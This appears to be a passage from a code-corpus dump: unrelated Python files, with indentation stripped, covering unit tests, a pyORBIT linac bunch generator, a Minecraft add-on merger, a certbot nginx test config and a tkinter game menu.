(_, alpha, beta, t, p) = self.model
return array(x).dot(p * alpha.reshape(-1, 1)).dot(beta) + t
|
python
|
import logging
from source.bridgeLogger import configureLogging
from nose2.tools.such import helper as assert_helper
def test_case01():
with assert_helper.assertRaises(TypeError):
configureLogging()
def test_case02():
with assert_helper.assertRaises(TypeError):
configureLogging('/tmp')
def test_case03():
with assert_helper.assertRaises(TypeError):
configureLogging(None, 'myLog')
def test_case04():
result = configureLogging('/tmp', 'mylog', 'abc')
assert isinstance(result, logging.Logger)
def test_case05():
result = configureLogging('/tmp', None, 'abc')
assert isinstance(result, logging.Logger)
def test_case06():
result = configureLogging('/tmp', None)
assert isinstance(result, logging.Logger)
|
python
|
import unittest
from imdb_app_data.moviemodel import MovieModel
from imdb_app_logic.movie_scraper import MovieScraper
from imdb_app_logic.ratingcalculator import RatingCalculator
class Test(unittest.TestCase):
def test_scraper(self):
scraper = MovieScraper()
scraper.get_movie_list()
#self.assertIsNotNone(scraper.topmovies)
self.assertTrue(len(scraper.topmovies) == 20)
def test_oscar_calculator(self):
test_movie = MovieModel(1,"TEST",5,20000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.calculate_oscar_rating(test_list)
self.assertTrue(test_list[0].adjusted_rating == 5.3)
def test_review_penalizer(self):
test_movie = MovieModel(1,"TEST",5,200000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.maxreviews = 500000
rc.review_penalizer(test_list)
self.assertTrue(test_list[0].adjusted_rating == 4.7)
if __name__ == "__main__":
unittest.main()
# python -m unittest unit_tests.py
|
python
|
from docker import DockerClient
from pytest import fixture
from yellowbox.clients import open_docker_client
@fixture(scope="session")
def docker_client() -> DockerClient:
with open_docker_client() as client:
yield client
|
python
|
def flow_control(k):
if (k == 0):
s = "Variable k = %d equals 0." % k
elif (k == 1):
s = "Variable k = %d equals 1." % k
else:
s = "Variable k = %d does not equal 0 or 1." % k
print(s)
def main():
i = 0
flow_control(i)
i = 1
flow_control(i)
i = 2
flow_control(i)
if __name__ == "__main__":
main()
|
python
|
# Copyright 2012 Philip Chimento
"""Sound the system bell, Qt implementation."""
from pyface.qt import QtGui
def beep():
"""Sound the system bell."""
QtGui.QApplication.beep()
|
python
|
"""
agenda:
1. speedup visualize_result
2. grouping labels
speed bottlenecks:
1. colorEncoding
results:
1. with visualize_result optimize: 0.045s --> 0.002s
2. with grouping labels: 0.002s --> 0.002-0.003s
"""
import os
import sys
import time
PATH = os.path.join(os.getcwd(), '..')
sys.path.append(PATH)
import csv
import numpy as np
import torch
from torchvision import transforms
import cv2
from img_utils import ImageLoad_cv2
from scipy.io import loadmat
from utils import colorEncode
from inference import predict, setup_model
from lib.utils import as_numpy
from profiler import profile
from idx_utils import create_idx_group, edit_colors_names_group
def preprocess():
WIDTH = 484
HEIGHT = 240
ENSEMBLE_N = 3
# GET COLOR ENCODING AND ITS INDEX MAPPING
colors = loadmat('../data/color150.mat')['colors']
root = '..'
names = {}
with open('../data/object150_info.csv') as f:
reader = csv.reader(f)
next(reader)
for row in reader:
names[int(row[0])] = row[5].split(";")[0]
idx_map = create_idx_group()
colors, names = edit_colors_names_group(colors, names)
# SETUP MODEL
cfg_path = os.path.join('..', 'config', 'ade20k-mobilenetv2dilated-c1_deepsup.yaml')
#cfg_path="config/ade20k-resnet18dilated-ppm_deepsup.yaml"
model = setup_model(cfg_path, root, gpu=0)
model.eval()
# GET DATA AND PROCESS IMAGE
data = np.load(os.path.join('..', 'test_set', 'cls1_rgb.npy'))
data = data[:, :, ::-1]
img = ImageLoad_cv2(data, WIDTH, HEIGHT, ENSEMBLE_N, True)
# MODEL FEED
predictions = predict(model, img, ENSEMBLE_N, gpu = 0, is_silent = False)
return predictions, colors, names, idx_map
def process_predict_bad(scores, colors, names, idx_map, is_silent):
"""
colorEncode is used
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
#seg = np.moveaxis(pred, 0, -1)
pred = idx_map[pred]
red = np.int32(pred)
pred_color = colorEncode(pred, colors).astype(np.uint8)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def process_predict_good(scores, colors, names, idx_map, is_silent):
"""
replace colorEncode by numpy way
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
pred = idx_map[pred]
pred = np.int32(pred)
pred_color = rock_the_colorencoding(pred, colors)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def rock_the_colorencoding(labelmap, colors):
return colors[labelmap]
if __name__ == '__main__':
# COLOR ENCODING
import matplotlib.pyplot as plt
predictions, colors, names, idx_map = preprocess()
print('Comparing Two Ways of Color Encoding...')
for i in range(5):
# bad: use colorEncode
torch.cuda.synchronize()
start = time.time()
pred_color_orig = process_predict_bad(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Original Runtime: {}s'.format(end - start))
# good: replace by numpy lookup
torch.cuda.synchronize()
start = time.time()
pred_color_gd = process_predict_good(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Improved Runtime: {}s'.format(end - start))
assert (pred_color_gd == pred_color_orig).all(), 'SOMETHING WRONG WITH NEW COLOR ENCODING'
plt.imshow(pred_color_gd)
plt.show()
|
python
|
#!/usr/bin/env python
#--------------------------------------------------------
# The classes will generates bunches for pyORBIT J-PARC linac
# at the entrance of LI_MEBT1 accelerator line (by default)
# It is parallel, but it is not efficient.
#--------------------------------------------------------
import math
import sys
import os
import random
import orbit_mpi
from orbit_mpi import mpi_comm
from orbit_mpi import mpi_datatype
from orbit_mpi import mpi_op
from orbit.bunch_generators import TwissContainer
from orbit.bunch_generators import KVDist2D, KVDist3D
from orbit.bunch_generators import GaussDist2D, GaussDist3D
from orbit.bunch_generators import WaterBagDist2D, WaterBagDist3D
from orbit.bunch_generators import TwissAnalysis
from bunch import Bunch
class JPARC_Linac_BunchGenerator:
"""
Generates the pyORBIT JPARC Linac Bunches.
Twiss parameters has the following units: x in [m], xp in [rad]
and the X and Y emittances are un-normalized. The longitudinal emittance
is in [GeV*m].
"""
def __init__(self,twissX, twissY, twissZ, frequency = 324.0e+6):
self.twiss = (twissX, twissY, twissZ)
self.bunch_frequency = frequency
self.bunch = Bunch()
syncPart = self.bunch.getSyncParticle()
#set H- mass
#self.bunch.mass(0.9382723 + 2*0.000511)
self.bunch.mass(0.939294)
self.bunch.charge(-1.0)
syncPart.kinEnergy(0.003)
self.c = 2.99792458e+8 # speed of light in m/sec
self.beam_current = 40.0 # beam current in mA
self.rf_wave_lenght = self.c/self.bunch_frequency
self.si_e_charge = 1.6021773e-19
def getKinEnergy(self):
"""
Returns the kinetic energy in GeV
"""
return self.bunch.getSyncParticle().kinEnergy()
def setKinEnergy(self, e_kin = 0.003):
"""
Sets the kinetic energy in GeV
"""
self.bunch.getSyncParticle().kinEnergy(e_kin)
def getZtoPhaseCoeff(self,bunch):
"""
Returns the coefficient to calculate phase in degrees from the z-coordinate.
"""
bunch_lambda = bunch.getSyncParticle().beta()*self.rf_wave_lenght
phase_coeff = 360./bunch_lambda
return phase_coeff
def getBeamCurrent(self):
"""
Returns the beam currect in mA
"""
return self.beam_current
def setBeamCurrent(self, current):
"""
Sets the beam currect in mA
"""
self.beam_current = current
def getBunch(self, nParticles = 0, distributorClass = WaterBagDist3D, cut_off = -1.):
"""
Returns the pyORBIT bunch with particular number of particles.
"""
comm = orbit_mpi.mpi_comm.MPI_COMM_WORLD
rank = orbit_mpi.MPI_Comm_rank(comm)
size = orbit_mpi.MPI_Comm_size(comm)
data_type = mpi_datatype.MPI_DOUBLE
main_rank = 0
bunch = Bunch()
self.bunch.copyEmptyBunchTo(bunch)
macrosize = (self.beam_current*1.0e-3/self.bunch_frequency)
macrosize /= (math.fabs(bunch.charge())*self.si_e_charge)
distributor = None
if(distributorClass == WaterBagDist3D):
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2])
else:
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2], cut_off)
bunch.getSyncParticle().time(0.)
for i in range(nParticles):
(x,xp,y,yp,z,dE) = distributor.getCoordinates()
(x,xp,y,yp,z,dE) = orbit_mpi.MPI_Bcast((x,xp,y,yp,z,dE),data_type,main_rank,comm)
if(i%size == rank):
bunch.addParticle(x,xp,y,yp,z,dE)
nParticlesGlobal = bunch.getSizeGlobal()
bunch.macroSize(macrosize/nParticlesGlobal)
return bunch
|
python
|
import excursion
import excursion.testcases.fast as scandetails
import excursion.optimize
import numpy as np
import logging
def test_2d():
scandetails.truth_functions = [
scandetails.truth,
]
N_INIT = 5
N_UPDATES = 1
N_BATCH = 5
N_DIM = 2
X,y_list, gps = excursion.optimize.init(scandetails, n_init = N_INIT, seed = 1)
index = 0
for index in range(1,N_UPDATES+1):
newX, acqvals = excursion.optimize.gridsearch(gps, X, scandetails, batchsize=N_BATCH)
newys_list = [func(np.asarray(newX)) for func in scandetails.truth_functions]
for i,newys in enumerate(newys_list):
y_list[i] = np.concatenate([y_list[i],newys])
X = np.concatenate([X,newX])
gps = [excursion.get_gp(X,y_list[i]) for i in range(len(scandetails.truth_functions))]
print(X,X.shape)
assert X.shape == (N_INIT + N_BATCH * N_UPDATES,N_DIM)
assert np.allclose(X[0],[6.25533007e-01, 1.08048674e+00])
|
python
|
#!/usr/bin/env python3
import time
import sys
import zmq
import numpy as np
import pyglet
from ctypes import byref, POINTER
from pyglet.gl import *
from pyglet.window import key
window = pyglet.window.Window(640, 640, style=pyglet.window.Window.WINDOW_STYLE_DIALOG)
def recv_array(socket):
"""
Receive a numpy array over zmq
"""
md = socket.recv_json()
msg = socket.recv(copy=True, track=False)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
A = A.reshape(md['shape'])
return A
def update(dt):
# Get an image from the camera
print('requesting image')
global last_img
socket.send_json({ 'robot': { 'get_image': None }})
last_img = recv_array(socket)
print('img received')
def step(vels, pos=None):
global last_img
req = {
"set_vels": vels,
#"get_image": None
}
if pos != None:
req['set_pos'] = pos
socket.send_json({"robot": req})
@window.event
def on_key_press(symbol, modifiers):
"""
if symbol == key.BACKSPACE or symbol == key.SLASH:
print('RESET')
env.reset()
env.render('pyglet')
return
"""
if symbol == key.ESCAPE:
sys.exit(0)
@window.event
def on_key_release(symbol, modifiers):
pass
@window.event
def on_draw():
img_height, img_width, _ = last_img.shape
# Draw the human render to the rendering window
img = np.ascontiguousarray(np.flip(last_img, axis=0))
img_data = pyglet.image.ImageData(
img_width,
img_height,
'RGB',
img.ctypes.data_as(POINTER(GLubyte)),
pitch=img_width * 3,
)
img_data.blit(
0,
0,
0,
width=window.width,
height=window.height
)
# Force execution of queued commands
glFlush()
@window.event
def on_close():
pyglet.app.exit()
# Connect to the Gym bridge ROS node
addr_str = "tcp://%s:%s" % ('flogo.local', 5858)
#addr_str = "tcp://%s:%s" % ('localhost', 5858)
print("Connecting to %s ..." % addr_str)
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(addr_str)
last_img = np.zeros(shape=(64, 64, 3), dtype=np.uint8)
last_img[:, :, 0] = 255
pyglet.clock.schedule_interval(update, 1/30.0)
pyglet.app.run()
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.mainpage_sec, name='index'),
path('authorize_ingress_sec', views.authorize_ingress_sec, name='authorize_ingress'),
path('revoke_ingress_sec', views.revoke_ingress_sec, name='authorize_ingress')
]
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Block',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1000, verbose_name='\u540d\u5b57')),
('desc', models.CharField(max_length=1000, verbose_name='\u63cf\u8ff0')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('manger', models.ForeignKey(verbose_name='\u7ba1\u7406\u5458', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': '\u677f\u5757',
'verbose_name_plural': '\u677f\u5757',
},
),
]
|
python
|
import json
import os
import shutil
from os import listdir
from os import path
from os.path import isfile, join
from zipfile import ZipFile
from shutil import copyfile
from glob import glob
import ntpath
import threading
import re
def find_all(name, path):
result = []
for root, dirs, files in os.walk(path):
if name in files:
result.append(os.path.join(root, name))
return result
def addDeathCounter(path_to_bp):
copy_ac(path_to_bp,"death_counter_j5cfmnkccwt7ppim3lsyue.json")
copy_animation(path_to_bp,"death_counter_start_j5cfmnkccwt7ppim3lsyue.json")
add_a_c_to_player(path_to_bp,
"controller.animation.death_counter_j5cfmnkccwt7ppim3lsyue",
"death_counter_j5cfmnkccwt7ppim3lsyue")
add_a_c_to_player(path_to_bp,
"animation.start_death_counter_j5cfmnkccwt7ppim3lsyue",
"start_death_counter_j5cfmnkccwt7ppim3lsyue")
def addWeatherClear(path_to_bp):
copy_ac(path_to_bp,"clear_weather_out_of_bed_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.clear_weather_out_of_bed_njorunnb628pievrfeckwx",
"clear_weather_id_out_of_bed_njorunnb628pievrfeckwx")
def addOPS(path_to_bp):
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.one_player_sleep_njorunnb628pievrfeckwx",
"one_player_sleep_njorunnb628pievrfeckwx")
def copy_ac(path_to_bp,ac_name):
path_to_a_c=join(path_to_bp,"animation_controllers")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups",ac_name),join(path_to_a_c,ac_name))
def copy_animation(path_to_bp,ani_name):
path_to_animations=join(path_to_bp,"animations")
if not(os.path.isdir(path_to_animations)):
os.mkdir(path_to_animations)
copyfile(join("lookups",ani_name),join(path_to_animations,ani_name))
def add_a_c_to_player(path_to_bp,a_c_handle,ac_common_handle,addtoscript=True):
result = [y for x in os.walk(path_to_bp) for y in glob(os.path.join(x[0], '*.json'))]
found=False
for file in result:
print(file)
with open(file, 'r+') as f:
data=""
for line in f:
data+=line
data=re.sub("\/\/[^\n]*\n", '', data )
data = json.loads(data)
if type(data) is dict:
if "minecraft:entity" in data.keys():
if data["minecraft:entity"]["description"]["identifier"]=="minecraft:player":
found=True
if "scripts" not in data["minecraft:entity"]["description"].keys() and addtoscript:
data["minecraft:entity"]["description"]["scripts"]={"animate":[]}
if "animations" not in data["minecraft:entity"]["description"].keys():
data["minecraft:entity"]["description"]["animations"]={}
if addtoscript:
data["minecraft:entity"]["description"]["scripts"]["animate"].append(ac_common_handle)
data["minecraft:entity"]["description"]["animations"][ac_common_handle]=a_c_handle
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
print(found)
if not found:
path_to_a_c=join(path_to_bp,"entities")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups","player.json"),join(path_to_a_c,"player.json"))
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
def edit_manifests(path_to_bp , packs):
with open(join(path_to_bp,"manifest.json"), 'r+') as f:
data = json.load(f)
data["header"]["description"]+=", modified by a RavinMaddHatters pack merge tool to include: {}".format(packs)
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
def mergePacks(path,death=False,ops=False,clearWeather=False):
cwd = os.getcwd()
path_to_save="temp"
with ZipFile(path, 'r') as zipObj:
zipObj.extractall(path_to_save)
manifests=find_all("manifest.json",path_to_save)
path_to_bp=""
for mani in manifests:
with open(mani) as f:
packmani = json.load(f)
for sub in packmani["modules"]:
if "data"== sub["type"]:
path_to_bp=os.path.dirname(mani)
pack =""
if clearWeather:
addWeatherClear(path_to_bp)
if death:
addDeathCounter(path_to_bp)
pack+="Death Counter"
if ops:
if len(pack)>0:
pack+=", "
pack+="One player sleep"
addOPS(path_to_bp)
if death or ops:
edit_manifests(path_to_bp,pack)
temp_path=join(cwd,path_to_save)
os.chdir(temp_path)
pack_name=ntpath.basename(path)
file_paths = []
for directory,_,_ in os.walk(temp_path):
files=glob(os.path.join(directory, "*.*"))
for file in files:
print(os.getcwd())
print(file)
file_paths.append(file.replace(os.getcwd()+"\\",""))
with ZipFile(pack_name, 'x') as zip:
for file in file_paths:
print(file)
zip.write(file)
os.chdir(cwd)
copyfile(join(path_to_save,pack_name),"merged_"+pack_name)
shutil.rmtree(path_to_save)
print("packs have been merged and processing is completed, please use merged_"+pack_name)
def loadJsonKillComments(jsonFile):
data=""
with open(jsonFile, 'r+') as f:
for line in f:
data+=line
data=re.sub("\/\/[^\n]*\n", '', data )
data = json.loads(data)
return data
def get_recursively(search_dict, field):
"""
Takes a dict with nested lists and dicts,
and searches all dicts for a key of the field
provided.
"""
fields_found = []
keys=[]
for key, value in search_dict.items():
if key == field:
fields_found.append(value)
keys.append([key])
elif isinstance(value, dict):
results,recurKeys = get_recursively(value, field)
for result in results:
fields_found.append(result)
for recurKey in recurKeys:
tempKey=[key]
tempKey+=recurKey
keys.append(tempKey)
elif isinstance(value, list):
for ind in range(len(value)):
item=value[ind]
if isinstance(item, dict):
more_results,more_recurKeys = get_recursively(item, field)
for another_result in more_results:
fields_found.append(another_result)
for more_recurkey in more_recurKeys:
tempKey=[ind]
tempKey+=more_recurkey
keys.append(tempKey)
return fields_found, keys
def check_compatiblity(Base,Cross):
path_to_base="base"
path_to_cross="Cross"
with ZipFile(Base, 'r') as zipObj:
zipObj.extractall(path_to_base)
with ZipFile(Cross, 'r') as zipObj:
zipObj.extractall(path_to_cross)
result = [y for x in os.walk(path_to_base) for y in glob(os.path.join(x[0], '*.json'))]
base_handles=[]
for file in result:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
base_handles+=fields_found
result2 = [y for x in os.walk(path_to_cross) for y in glob(os.path.join(x[0], '*.json'))]
cross_handles=[]
for file in result2:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
cross_handles+=fields_found
print(base_handles)
print(cross_handles)
shutil.rmtree(path_to_base)
shutil.rmtree(path_to_cross)
return set(base_handles).intersection(set(cross_handles))
if __name__ == "__main__":
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import StringVar, Button, Label, Entry, Tk, Checkbutton, END, ACTIVE
from tkinter import filedialog, Scale,DoubleVar,HORIZONTAL,IntVar,Listbox, ANCHOR
def browsepack():
#browse for a structure file.
packPath.set(filedialog.askopenfilename(filetypes=(
("addon", "*.mcaddon *.MCADDON *.MCPACK *mcpack"),("zip", "*.zip *.ZIP") )))
def make_pack_from_gui():
mergePacks(packPath.get(),
death=death_counter_check.get(),
ops=ops_counter_check.get(),
clearWeather=clear_counter_check.get())
def crossCheckPacksGui():
base_pack=packPath.get()
if len(base_pack)>0:
cross_pack=(filedialog.askopenfilename(filetypes=(
("Addon to Cross Check", "*.mcaddon *.MCADDON *.MCPACK *.MCPACK" ),("zip", "*.zip *.ZIP") )))
intersections=check_compatiblity(base_pack,cross_pack)
print(intersections)
if len(intersections)!=0:
printInt="\n".join(intersections)
messagebox.showerror("Not Compatible","The two packs are not compatible because they both modify the following game features: \n{}".format(printInt))
else:
messagebox.showinfo("Compatible","The two packs are likely compatible")
else:
messagebox.showerror("No Base Pack", "You must first select a base pack to check compatiblity")
root = Tk()
root.title("Addon Checker")
core_pack=Label(root, text="Core Pack")
add_ins=Label(root, text="Common Additions (will be added to the core pack):")
death_counter_check = IntVar()
ops_counter_check = IntVar()
clear_counter_check = IntVar()
packPath = StringVar()
death_check = Checkbutton(root, text="Death Counter", variable=death_counter_check, onvalue=1, offvalue=0)
ops_check = Checkbutton(root, text="One Player Sleep", variable=ops_counter_check, onvalue=1, offvalue=0)
clear_check = Checkbutton(root, text="One player sleep with clear weather", variable=clear_counter_check, onvalue=1, offvalue=0)
browsButton = Button(root, text="Browse", command=browsepack)
packButton = Button(root, text="Merge in Packs", command=make_pack_from_gui)
Cross_check = Button(root, text="Cross Check a Pack", command=crossCheckPacksGui)
path_entry = Entry(root, textvariable=packPath, width=30)
r=0
core_pack.grid(row=r, column=0,columnspan=2)
r+=1
path_entry.grid(row=r, column=0)
browsButton.grid(row=r, column=1)
r+=1
add_ins.grid(row=r, column=0,columnspan=2)
r+=1
death_check.grid(row=r, column=0,columnspan=2)
r+=1
ops_check.grid(row=r, column=0,columnspan=2)
r+=1
clear_check.grid(row=r, column=0,columnspan=2)
r+=1
Cross_check.grid(row=r, column=0)
packButton.grid(row=r, column=1)
root.mainloop()
root.quit()
|
python
|
__author__ = 'Sergei'
from model.contact import Contact
from random import randrange
def test_del_contact(app):
if app.contact.count() == 0:
app.contact.create_c(Contact(first_n= "first",mid_n= "middle",last_n= "last",nick_n= "kuk",company= "adda",address= "575 oiweojdckjgsd,russia",home_ph= "12134519827",
cell_ph= "120092340980",email= "[email protected]"))
old_contact = app.contact.get_contact_list()
index = randrange(len(old_contact))
app.contact.contact_delete_by_index(index)
new_contact = app.contact.get_contact_list()
assert len(old_contact) - 1 == len(new_contact)
old_contact[index:index+1] = []
assert old_contact == new_contact
|
python
|
# -*- coding: utf-8 -*-
"""General purpose nginx test configuration generator."""
import getpass
from typing import Optional
import pkg_resources
def construct_nginx_config(nginx_root: str, nginx_webroot: str, http_port: int, https_port: int,
other_port: int, default_server: bool, key_path: Optional[str] = None,
cert_path: Optional[str] = None, wtf_prefix: str = 'le') -> str:
"""
This method returns a full nginx configuration suitable for integration tests.
:param str nginx_root: nginx root configuration path
:param str nginx_webroot: nginx webroot path
:param int http_port: HTTP port to listen on
:param int https_port: HTTPS port to listen on
:param int other_port: other HTTP port to listen on
:param bool default_server: True to set a default server in nginx config, False otherwise
:param str key_path: the path to a SSL key
:param str cert_path: the path to a SSL certificate
:param str wtf_prefix: the prefix to use in all domains handled by this nginx config
:return: a string containing the full nginx configuration
:rtype: str
"""
key_path = key_path if key_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/key.pem')
cert_path = cert_path if cert_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/cert.pem')
return '''\
# This error log will be written regardless of server scope error_log
# definitions, so we have to set this here in the main scope.
#
# Even doing this, Nginx will still try to create the default error file, and
# log a non-fatal error when it fails. After that things will work, however.
error_log {nginx_root}/error.log;
# The pidfile will be written to /var/run unless this is set.
pid {nginx_root}/nginx.pid;
user {user};
worker_processes 1;
events {{
worker_connections 1024;
}}
# “This comment contains valid Unicode”.
http {{
# Set an array of temp, cache and log file options that will otherwise default to
# restricted locations accessible only to root.
client_body_temp_path {nginx_root}/client_body;
fastcgi_temp_path {nginx_root}/fastcgi_temp;
proxy_temp_path {nginx_root}/proxy_temp;
#scgi_temp_path {nginx_root}/scgi_temp;
#uwsgi_temp_path {nginx_root}/uwsgi_temp;
access_log {nginx_root}/error.log;
# This should be turned off in a Virtualbox VM, as it can cause some
# interesting issues with data corruption in delivered files.
sendfile off;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
#include /etc/nginx/mime.types;
index index.html index.htm index.php;
log_format main '$remote_addr - $remote_user [$time_local] $status '
'"$request" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
default_type application/octet-stream;
server {{
# IPv4.
listen {http_port} {default_server};
# IPv6.
listen [::]:{http_port} {default_server};
server_name nginx.{wtf_prefix}.wtf nginx2.{wtf_prefix}.wtf;
root {nginx_webroot};
location / {{
# First attempt to serve request as file, then as directory, then fall
# back to index.html.
try_files $uri $uri/ /index.html;
}}
}}
server {{
listen {http_port};
listen [::]:{http_port};
server_name nginx3.{wtf_prefix}.wtf;
root {nginx_webroot};
location /.well-known/ {{
return 404;
}}
return 301 https://$host$request_uri;
}}
server {{
listen {other_port};
listen [::]:{other_port};
server_name nginx4.{wtf_prefix}.wtf nginx5.{wtf_prefix}.wtf;
}}
server {{
listen {http_port};
listen [::]:{http_port};
listen {https_port} ssl;
listen [::]:{https_port} ssl;
if ($scheme != "https") {{
return 301 https://$host$request_uri;
}}
server_name nginx6.{wtf_prefix}.wtf nginx7.{wtf_prefix}.wtf;
ssl_certificate {cert_path};
ssl_certificate_key {key_path};
}}
}}
'''.format(nginx_root=nginx_root, nginx_webroot=nginx_webroot, user=getpass.getuser(),
http_port=http_port, https_port=https_port, other_port=other_port,
default_server='default_server' if default_server else '', wtf_prefix=wtf_prefix,
key_path=key_path, cert_path=cert_path)
|
python
|
from tkinter import *
from tkinter import font
from tkinter import ttk
from importlib import reload
game_loadonce = False
def play():
global game
global menuApp, game_loadonce
menuApp.save_scores("leaderboard.txt")
menuApp.root.destroy()
if game_loadonce == False:
import game
game_loadonce = True
else:
reload(game)
menuApp = _menuApp()
menuApp.fnh_ttl.configure(text="Score: "+str(game.score))
menuApp.getname1()
class _menuApp():
def sortf(self, scr):
i2 = 0
for i in range(len(scr), 0, -1):
if scr[i:i+2] == '- ':
i2 = i
break
i2 += 2
return -int(scr[i2:])
def load_scores(self, fname):
try:
file = open(fname, mode='r')
except FileNotFoundError:
file = open(fname, 'a')
file.close()
return
for line in file.readlines():
line = line.strip()
self.scores.append(line)
self.scores.sort(key=self.sortf)
file.close()
def save_scores(self, fname):
file = open(fname, mode='w')
for line in self.scores:
file.write(line+'\n')
file.close()
def update_scores(self, name=None, score=None):
if name != None and score != None:
msg = name+' - '+str(score)
self.scores.append(msg)
self.scores.sort(key=self.sortf)
self.scr_lst_v.set(value=self.scores)
self.save_scores("leaderboard.txt")
def quit(self):
self.destroyed = True
self.root.quit()
def leaderboard(self, prev_f):
prev_f.place_forget()
self.main.place_forget()
self.ldr_brd.place(x=0, y=0)
def mainmenu(self, prev_f):
prev_f.place_forget()
self.main.place(x=0, y=0)
def getname1(self):
self.main.place_forget()
self.finish.place(x=0, y=0)
def getname2(self):
self.finish.place_forget()
self.main.place(x=0, y=0)
if menuApp.txtname.get() == '':
menuApp.txtname.set('Anonymous')
menuApp.update_scores(menuApp.txtname.get(), game.score)
def __init__(self):
self.rescr = (512, 512)
self.root = Tk()
self.root.title("SPACE ATTXK")
self.root.geometry(str(self.rescr[0]) + 'x' + str(self.rescr[1]))
self.root.resizable(False, False)
self.font1 = font.Font(family='Arial', size=24)
self.font2 = font.Font(family='Arial', size=12)
self.s = ttk.Style()
self.s.configure('TButton', font=self.font2)
self.main = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.main.columnconfigure(0, weight=1)
self.main.columnconfigure(3, weight=1)
self.main.rowconfigure(0, weight=1)
self.main.rowconfigure(6, weight=1)
self.main.grid_propagate(0)
self.main.place(x=0, y=0)
self.title = ttk.Label(
self.main, text="SPACE ATTXCK", font=self.font1, padding=32)
self.title.grid(row=1, column=0, columnspan=4)
self.strt_btn = ttk.Button(self.main, text="Play", command=play)
self.strt_btn.grid(row=2, column=2, sticky=S+E+W)
self.ldr_btn = ttk.Button(
self.main, text="Leaderboard", command=lambda: self.leaderboard(self.main))
self.ldr_btn.grid(row=3, column=2, sticky=N+E+S+W)
self.settings = ttk.Button(
self.main, text="Exit", command=lambda: exit())
self.settings.grid(row=4, column=2, sticky=N+E+W)
ctl_txt = "Controls:\nJump - Space\n Fire - Enter\nEscape - Pause Game"
self.controls = ttk.Label(
self.main, text=ctl_txt, font=self.font2, justify=CENTER, padding=32)
self.controls.grid(row=5, column=2, sticky=N+E+W)
self.scores = []
self.scr_lst_v = StringVar(value=self.scores)
self.load_scores("leaderboard.txt")
self.update_scores()
self.ldr_brd = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.ldr_brd.columnconfigure(0, weight=1)
self.ldr_brd.columnconfigure(3, weight=1)
# self.ldr_brd.rowconfigure(0,weight=1)
self.ldr_brd.grid_propagate(0)
self.ldr_ttl = ttk.Label(
self.ldr_brd, text="Leaderboard", font=self.font1, padding=32, justify=CENTER)
self.ldr_ttl.grid(row=1, column=2)
self.ldr_lst = Listbox(self.ldr_brd, listvariable=self.scr_lst_v,
height=10, selectmode='browse', font=self.font2)
self.ldr_lst.grid(row=2, column=2, padx=16, pady=16)
self.ldr_exit = ttk.Button(
self.ldr_brd, text="Main Menu", command=lambda: self.mainmenu(self.ldr_brd))
self.ldr_exit.grid(row=3, column=2)
self.finish = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.finish.rowconfigure(0, weight=1)
self.finish.rowconfigure(5, weight=1)
self.finish.columnconfigure(1, weight=1)
self.finish.columnconfigure(3, weight=3)
self.finish.grid_propagate(0)
self.txtname = StringVar()
self.fnh_ttl = ttk.Label(self.finish, text="",
font=self.font1, justify=CENTER)
self.fnh_ttl.grid(row=1, column=2, padx=16, pady=16)
self.fnh_lbl1 = ttk.Label(
self.finish, text="Enter name:", font=self.font2, justify=CENTER)
self.fnh_lbl1.grid(row=3, column=1, padx=16)
self.fnh_txtin = ttk.Entry(
